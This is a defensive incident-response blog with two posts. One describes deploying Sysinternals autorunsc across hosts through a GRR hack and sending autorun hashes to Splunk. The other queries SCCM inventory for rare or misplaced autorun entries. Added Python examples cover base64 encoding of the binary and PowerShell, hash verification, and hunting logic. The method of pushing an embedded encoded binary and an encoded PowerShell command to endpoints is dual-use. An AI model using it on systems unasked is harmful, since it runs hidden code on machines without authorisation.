Information on Security (twitter.com/keithtyler)<br />
<br />
Enterprise Autorun Collections with autorunsc.exe (2019-10-09)<br />
Anyone know of a tool that can collect the hashes of autorun locations as thoroughly as Mark Russinovich's <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" target="_blank">autoruns</a> tool? I thought it would be nice to have that level of detail reported to Splunk from all systems so the hashes can be checked in VirusTotal to find the low-hanging malware fruit.<br />
<br />
Since I enjoy learning Python and PowerShell, I put together a GRR <a href="https://grr-doc.readthedocs.io/en/latest/investigating-with-grr/pushing-code.html#deploying-arbitrary-python-code" target="_blank">python_hack</a> that launches autorunsc.exe and sends its output to Splunk. With <a href="https://github.com/google/grr" target="_blank">GRR Rapid Response</a> you can launch this as a hunt across all hosts.<br />
<br />
The full script is on <a href="https://github.com/keithtyler/autorun_hunter" target="_blank">github</a>; here's a breakdown of what I put together (with thanks to the folks at stackoverflow.com).<br />
<br />
Process flow:<br />
<ul>
<li>The GRR python hack decodes and unzips autorunsc.exe, then writes it to the target host</li>
<li>The python hack then executes a PowerShell encoded command</li>
<li>The PowerShell command runs autorunsc.exe and reports the specified details to the event log via Write-EventLog, where your log collector will pick them up and forward them to your SIEM</li>
</ul>
GRR has some weirdness with very long lines, so I had to split the binary into two parts. The autorunsc.exe binary is base64 encoded and assigned to autorunscBinary00 and autorunscBinary01. Since the encoded binary is over 2000 lines, it is collapsed in the picture below for easier reading.<br />
<br />
I encoded autorunsc.exe and the PowerShell script (the b64Powershell variable) using this:<br />
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$data = { powershell script here }</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$Bytes = [System.Text.Encoding]::Unicode.GetBytes($data)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$EncodedData = [Convert]::ToBase64String($Bytes)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$EncodedData</span></blockquote>
For the binary file I used PowerShell's Get-Content and assigned that output to <span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$data</span>.<br />
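As an added example (not code from the autorun_hunter script or from GRR), here is the preparation side of the process flow above written in Python, the language the GRR python_hack is in: the PowerShell one-liner is UTF-16LE and base64 encoded exactly as the snippet above does it (powershell.exe -EncodedCommand expects that encoding), the binary is compressed, base64 encoded and split into two chunks to get around the long-line problem, and on the way back the decoded binary's SHA-256 is checked against a pinned value before anything would be written to disk. Two assumptions: zlib stands in for a zip archive to keep the example short, and the binary must be read as raw bytes on the encoding side (for example [IO.File]::ReadAllBytes or Get-Content -Encoding Byte in Windows PowerShell); reading it as text corrupts the decoded file.<br />

```python
import base64
import hashlib
import zlib

# Added example, not the autorun_hunter script's own code. zlib is used in
# place of a zip archive (assumption, to keep the example short).


def encode_powershell(script):
    """Same as [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($data)):
    powershell.exe -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded):
    return base64.b64decode(encoded).decode("utf-16-le")


def powershell_command_line(script):
    """Argument vector the hack would hand to subprocess on the endpoint."""
    return ["powershell.exe", "-NoProfile", "-NonInteractive",
            "-EncodedCommand", encode_powershell(script)]


def pack_binary(raw, parts=2):
    """Compress, base64 and split into `parts` text chunks (GRR dislikes very long lines)."""
    text = base64.b64encode(zlib.compress(raw, 9)).decode("ascii")
    size = -(-len(text) // parts)  # ceiling division
    return [text[i:i + size] for i in range(0, len(text), size)]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def unpack_binary(chunks, expected_sha256):
    """Join, decode, decompress and verify; only write to disk when this returns."""
    try:
        raw = zlib.decompress(base64.b64decode("".join(chunks), validate=True))
    except (ValueError, zlib.error) as exc:  # binascii.Error is a ValueError
        raise ValueError(f"embedded binary is corrupt: {exc}") from exc
    digest = sha256_hex(raw)
    if digest != expected_sha256.lower():
        raise ValueError(f"embedded binary hash mismatch: got {digest}")
    return raw


def tamper_detected(chunks, expected_sha256):
    """True when the embedded binary is damaged or does not match the pinned hash."""
    try:
        unpack_binary(chunks, expected_sha256)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed stand-in for autorunsc.exe; a real build pins the SHA-256
    # of the autorunsc.exe you actually downloaded.
    fake_binary = b"MZ" + bytes(range(256)) * 64
    pinned = sha256_hex(fake_binary)
    chunks = pack_binary(fake_binary)
    print(f"{len(chunks)} chunks of up to {len(chunks[0])} chars")
    print("verified" if not tamper_detected(chunks, pinned) else "MISMATCH")
    cmd = powershell_command_line(
        "Write-EventLog -LogName Application -Source GRR -EventId 187 -Message 'test'")
    print(cmd[:-1], cmd[-1][:32] + "...")
```

The hash check is the part worth keeping: a hack that drops and runs whatever bytes it was handed is a convenient channel for anyone who can edit the hunt, so the endpoint side should refuse a binary that does not match the value baked into the script.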
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-bTDzEMctKIk/XZ1z3bWeFMI/AAAAAAAA9Ns/Pc7rJMSbSiYbccPkJwnNKKxLXBMgJdO0QCLcBGAsYHQ/s1600/py.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1472" data-original-width="1600" height="587" src="https://1.bp.blogspot.com/-bTDzEMctKIk/XZ1z3bWeFMI/AAAAAAAA9Ns/Pc7rJMSbSiYbccPkJwnNKKxLXBMgJdO0QCLcBGAsYHQ/s640/py.PNG" width="640" /></a></div>
Here is the decoded PowerShell command held in the b64Powershell variable:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-yRBXkjqQ2e8/XZ12BrUXVFI/AAAAAAAA9N4/OwJ5MlPITg0jU-KXGivJSKQ3bi7nUv4vgCLcBGAsYHQ/s1600/ps.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="1600" height="192" src="https://1.bp.blogspot.com/-yRBXkjqQ2e8/XZ12BrUXVFI/AAAAAAAA9N4/OwJ5MlPITg0jU-KXGivJSKQ3bi7nUv4vgCLcBGAsYHQ/s640/ps.PNG" width="640" /></a></div>
<br />
There are more fields available from autorunsc.exe, but for the purpose of checking hashes in VirusTotal I'm interested in SHA256, location, path and signer. Each of those values returned by autorunsc is prefixed with "Field=" so it's easier to work with in Splunk. Example query to view the results:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">index=windows GRR EventID=187 | table Workstation hash Location Path Signer</span></blockquote>
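An added example (not the autorun_hunter script's own code) of the middle of the flow: parsing autorunsc's CSV output, keeping only the four fields above, and emitting them as key=value text with the values double-quoted so that the spaces in signer names survive key=value extraction in Splunk; the matching parser is included so the round trip can be checked before trusting the SIEM side. The sample CSV is constructed in the shape of autorunsc -c -h output (check the header row your version prints), the escaping convention is this example's own, and rows with an empty SHA-256, which is what you get when autorunsc cannot find the image to hash, are set aside rather than sent to VirusTotal.<br />

```python
import csv
import io
import re

# Added example, not the autorun_hunter script's own code. The CSV below is
# constructed in the shape of `autorunsc -c -h` output (assumption: verify the
# header row against your version). Hashes are placeholders.
SHA_SYS = "11" * 32
SHA_UNKNOWN = "ab" * 32
SAMPLE_CSV = (
    "Time,Entry Location,Entry,Enabled,Category,Profile,Description,Signer,Company,"
    "Image Path,Version,Launch String,MD5,SHA-1,PESHA-1,PESHA-256,SHA-256,IMP\n"
    "20190101-120000,HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,SecurityHealth,"
    "enabled,Logon,System-wide,Windows Security notification icon,(Verified) Microsoft Windows,"
    "Microsoft Corporation,c:\\windows\\system32\\securityhealthsystray.exe,10.0.17763.1,"
    f"%windir%\\system32\\SecurityHealthSystray.exe,,,,,{SHA_SYS},\n"
    "20190101-120000,HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,Updater,"
    "enabled,Logon,CONTOSO\\alice,,(Not verified) Contoso Ltd,,c:\\users\\public\\updater.exe,,"
    f'"c:\\users\\public\\updater.exe -silent, -q",,,,,{SHA_UNKNOWN},\n'
    # image missing: nothing to hash, so the hash columns are empty
    "20190101-120000,HKLM\\SYSTEM\\CurrentControlSet\\Services,OldSvc,enabled,Services,"
    "System-wide,,,,File not found: c:\\program files\\old\\svc.exe,,,,,,,,\n"
)

# autorunsc column -> field name used by the Splunk query in the post
FIELD_MAP = {"SHA-256": "hash", "Entry Location": "Location",
             "Image Path": "Path", "Signer": "Signer"}


def parse_autorunsc(text):
    """One dict per autorun entry, reduced to the four fields we ship."""
    reader = csv.DictReader(io.StringIO(text))
    return [{field: (row.get(col) or "").strip() for col, field in FIELD_MAP.items()}
            for row in reader]


def hashes_to_check(records):
    """Unique SHA-256s worth a VirusTotal lookup, plus the entries that had none."""
    hashes, unhashed = set(), []
    for rec in records:
        if rec["hash"]:
            hashes.add(rec["hash"].lower())
        else:
            unhashed.append(rec["Path"] or rec["Location"])
    return sorted(hashes), unhashed


def _quote(value):
    # this example's own convention: backslash-escape backslashes and quotes
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def to_event(record, workstation):
    """Key=value message for Write-EventLog; quoting keeps spaces inside values."""
    pairs = [("Workstation", workstation)] + [
        (k, record[k]) for k in ("hash", "Location", "Path", "Signer")]
    return " ".join(f"{key}={_quote(value)}" for key, value in pairs)


_PAIR = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')


def parse_event(line):
    """Inverse of to_event; proves the message survives a key=value extraction."""
    return {key: re.sub(r"\\(.)", r"\1", raw) for key, raw in _PAIR.findall(line)}


if __name__ == "__main__":
    records = parse_autorunsc(SAMPLE_CSV)
    for rec in records:
        print(to_event(rec, "WS01"))
    hashes, unhashed = hashes_to_check(records)
    print(len(hashes), "hashes to look up;", len(unhashed), "entries with no image on disk")
```

Entries whose image is missing are not noise: a Run key or service that points at a file that no longer exists is often what is left after an incomplete cleanup, so they are returned separately rather than dropped.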
<br />
Now that you have all the autorun hashes in your SIEM, you can pipe those hashes to a VirusTotal Splunk app and find some low-hanging malware fruit!<br />
<br />
Microsoft's Accidental Enterprise DFIR Tool (2015-11-23)<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SCCM can be a goldmine when hunting for evil: all you need to do is enable some inventory collections, send them to Splunk and get creative. While the data is a snapshot in time (usually the last 24 hours), it can be a great starting point when dealing with incidents, plus most enterprises already have SCCM.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this post I'll breeze over the setup and configuration and focus more on some of the searches you can do to find evil. As a bonus, you can use this to monitor the health and coverage of your security agents with some pretty dashboards in Splunk.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Some enterprise wide hunting-for-evil examples I’ll cover:</span></div>
<ul>
<li>Finding service outliers</li>
<li>Finding the least frequently occurring persistence mechanisms via autoruns</li>
<li>Finding the least frequently occurring installed services</li>
<li>Least frequently occurring executables</li>
<li>Services running from abnormal paths</li>
<li>Triaging the enterprise using IoCs</li>
</ul>
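As an added example (not the post's own searches, which the list above only names), here are those hunts in Python over rows shaped like the autorun query later in the post (Hostname plus v_GS_AUTOSTART_SOFTWARE columns), so the logic is explicit before it is translated into SPL or SQL: least frequency of occurrence counted per distinct host rather than per row, executables launched from outside the usual program directories, and IoC hash triage. Assumptions: StartupValue0 holds the launch string, the trusted-path list and environment-variable map are mine, and the rows and hashes are constructed.<br />

```python
from collections import defaultdict

# Added example, not the post's own searches. Rows are constructed in the
# shape of the post's autorun query; column meanings are assumptions and
# hashes are placeholders.
SYS_HASH = "11" * 32
HELPER_HASH = "22" * 32
RARE_HASH = "ee" * 32
RUN_KEY = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
USER_RUN_KEY = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
SERVICES_KEY = "HKLM\\SYSTEM\\CurrentControlSet\\Services"


def _row(host, name, digest, location, publisher, value):
    return {"Hostname": host, "FileName0": name, "FilePropertiesHashEx0": digest,
            "Location0": location, "Publisher0": publisher, "StartupValue0": value}


ROWS = [
    _row(h, "SecurityHealthSystray.exe", SYS_HASH, RUN_KEY, "Microsoft Corporation",
         "%windir%\\system32\\SecurityHealthSystray.exe")
    for h in ("WS01", "WS02", "WS03", "WS04", "WS05")
] + [
    _row("WS03", "updater.exe", RARE_HASH, USER_RUN_KEY, "",
         '"C:\\Users\\Public\\updater.exe" -silent'),
    # the same entry reported twice by one host must count as one host, not two
    _row("WS03", "updater.exe", RARE_HASH, USER_RUN_KEY, "",
         '"C:\\Users\\Public\\updater.exe" -silent'),
    _row("WS05", "svchelper.exe", HELPER_HASH, SERVICES_KEY, "",
         "C:\\ProgramData\\helper\\svchelper.exe -k"),
]


def hosts_per_value(rows, column):
    """Distinct hosts per value of `column` (the stacking step of least-frequency hunting)."""
    seen = defaultdict(set)
    for r in rows:
        if r.get(column):
            seen[r[column]].add(r["Hostname"])
    return {value: len(hosts) for value, hosts in seen.items()}


def least_frequent(rows, column, max_hosts=1):
    """Values seen on at most `max_hosts` hosts, rarest first."""
    counts = hosts_per_value(rows, column)
    return sorted((v for v, n in counts.items() if n <= max_hosts),
                  key=lambda v: (counts[v], v))


# assumed expansions; extend for your environment
_ENV = {"%windir%": "C:\\Windows", "%systemroot%": "C:\\Windows",
        "%programfiles%": "C:\\Program Files"}


def image_path(launch):
    """Executable from a launch string: the quoted path, else the first token.
    An unquoted path containing spaces is itself worth flagging; this takes its first token."""
    s = launch.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        path = s[1:end] if end > 0 else s[1:]
    else:
        path = s.split()[0] if s else ""
    low = path.lower()
    for var, real in _ENV.items():
        if low.startswith(var):
            path = real + path[len(var):]
            break
    return path


TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def abnormal_paths(rows, trusted=TRUSTED_PREFIXES):
    """(host, path) pairs for entries launched from outside the trusted directories."""
    found = {(r["Hostname"], image_path(r["StartupValue0"])) for r in rows}
    return sorted((h, p) for h, p in found if not p.lower().startswith(trusted))


def ioc_hits(rows, ioc_hashes):
    """Hosts per matching hash, for triaging an IoC list across the inventory."""
    wanted = {h.lower() for h in ioc_hashes}
    hits = defaultdict(set)
    for r in rows:
        digest = r["FilePropertiesHashEx0"].lower()
        if digest in wanted:
            hits[digest].add(r["Hostname"])
    return {digest: sorted(hosts) for digest, hosts in hits.items()}


if __name__ == "__main__":
    print("rare hashes:", least_frequent(ROWS, "FilePropertiesHashEx0"))
    print("rare names:", least_frequent(ROWS, "FileName0"))
    print("abnormal paths:", abnormal_paths(ROWS))
    print("ioc hits:", ioc_hits(ROWS, [RARE_HASH]))
```

Counting distinct hosts instead of rows matters with inventory data: SCCM can report the same entry from one machine more than once, and a row count would make a single infected host look like a small population.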
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Ingredients</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1 Microsoft SCCM server + access to the SCCM SQL server.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1 Splunk server</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1 Splunk DB Connect App</span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-size: xx-small;"><span style="font-family: "arial"; line-height: 20.24px; white-space: pre-wrap;">* </span><span style="font-family: "arial"; line-height: 1.38; white-space: pre-wrap;">Adult beverage is optional but strongly recommended. </span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Preparing SCCM</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In SCCM enable the collection of Autoruns, Browser Helper Objects (BHO) and inventory collection of all executables. This collected data can then be pulled into Splunk or queried directly with SQL statements.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Preparing DB Connect App in Splunk</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The DB app executes the SQL queries on a scheduled basis and dumps them into a defined index. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Under "Identities" add the MS SQL server credentials. Under "Connections" add the SCCM SQL server. Click Validate to make sure everything is configured correctly. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Y93x89Vt-mA/VlPqCnRuwgI/AAAAAAAAuVw/Q5KcKE4jQmc/s1600/NewConnection.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://3.bp.blogspot.com/-Y93x89Vt-mA/VlPqCnRuwgI/AAAAAAAAuVw/Q5KcKE4jQmc/s640/NewConnection.tiff" width="640" /></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now, to get useful data into Splunk you’ll need to write SQL queries. Your SQL server table names will probably differ, so verify the queries directly in SQL manager to make sure they work and pull back data the way you expect. As an example we’ll use autoruns; the process is the same for all queries.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Autorun lookup</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Autoruns has a ton of good info, so you’ll want this data imported after the collection process runs; the default (I think) is every 24 hours. Here is the query I used to import all the autorun data:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">SELECT [Name] AS Hostname,</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[Description0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[FileName0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[FilePropertiesHash0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[FilePropertiesHashEx0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[FileVersion0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[Location0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[Product0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[ProductVersion0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[Publisher0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[StartupType0],</span><br />
<span style="font-family: Courier New, Courier, monospace;">&nbsp;&nbsp;&nbsp;&nbsp;[StartupValue0]</span><br />
<span style="font-family: Courier New, Courier, monospace;">FROM [SCCM].[dbo].[v_GS_AUTOSTART_SOFTWARE]</span><br />
<span style="font-family: Courier New, Courier, monospace;">LEFT JOIN [SCCM].[dbo].[v_ActiveClients] Name ON ResourceID = MachineResourceID</span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The LEFT JOIN gives you the hostname, looked up by ResourceID, along with all of the autorun details. Modify this to your needs and paste it into the “Input SQL” field.</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Select batch and paste in your SQL statement:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="352px;" src="https://lh6.googleusercontent.com/fYRhpFKwj78Vgn90aB9KcJ-DYGjZ28vmFTxI3zepoO9LgbCmWgF-gvyPTN45RzbP-WoX6X3vKMdLFnWjBj4SVkyEhsjWhZgmlaG1QXyolrgyFlukmzB7VhgZTpe8_Ma7dPc6hWH2" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Click "More settings", set the lookup period to every 24 hours, and set the sourcetype and index:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="410px;" src="https://lh3.googleusercontent.com/AzqkRPqEKa50EURCHtsqJLh2PeZcrpQ0B0Hqg0-8fdFagZOp6-FIp6Fnlowic1uDymcxWMKyoUd_FbSPBhZz-tpx7VzSZvWi7ASi3pLi-WROP-4kAPYS0C1syl8Ht0eAC0ca47b9" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="544px;" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Save the input, take a swig and you’re done.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hunting</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you’re not able to import the entire inventory of executables due to $plunk license, consider outputting the aggregated data from these examples or investigate Elasticsearch. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Since we now have all autorun data going to Splunk, we can use the following query to show autorun persistence that appear on less than 10 systems in the enterprise (by filename).</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="105px;" src="https://lh3.googleusercontent.com/JnlUGE9jAvHnT3N3pSrALXdl1GK3HS6xeaZX_d8aFPe5yIg1owbOPEcPR-gQLMTXjzCK8h6MGH93DI-4iw9MlNm0T8Erdxh4_e8MvRsxoSFBuzsQZhmoUXn-52P8Z_7qFzDynn3s" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you see a filename like ‘Update.exe’ which only exists on one system, probably going to want to investigate it. Get creative, search by product name, description or a combination of both. Since everything is timestamped you might consider adding a report on servers or high-valued targets like executives and their administrative staff. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Find malware that attempts to hide by using common Windows system filenames like ‘svchost.exe’ that are in the wrong directory: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="121px;" src="https://lh6.googleusercontent.com/w7foS0_Q4i8Tr4-dzRZF4v0K5i4zEc0YGOKdxlBwdn_kjgH-Fvz-W1SE0jQQ01e6KQbN3ZXnF_Am5DgWbZvOacIwzsBGY6HIesNv0hGMS2p7AJ4_lZBWRnZUz_r4Aeqthm7BYFUJ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="452px;" /></span></div>
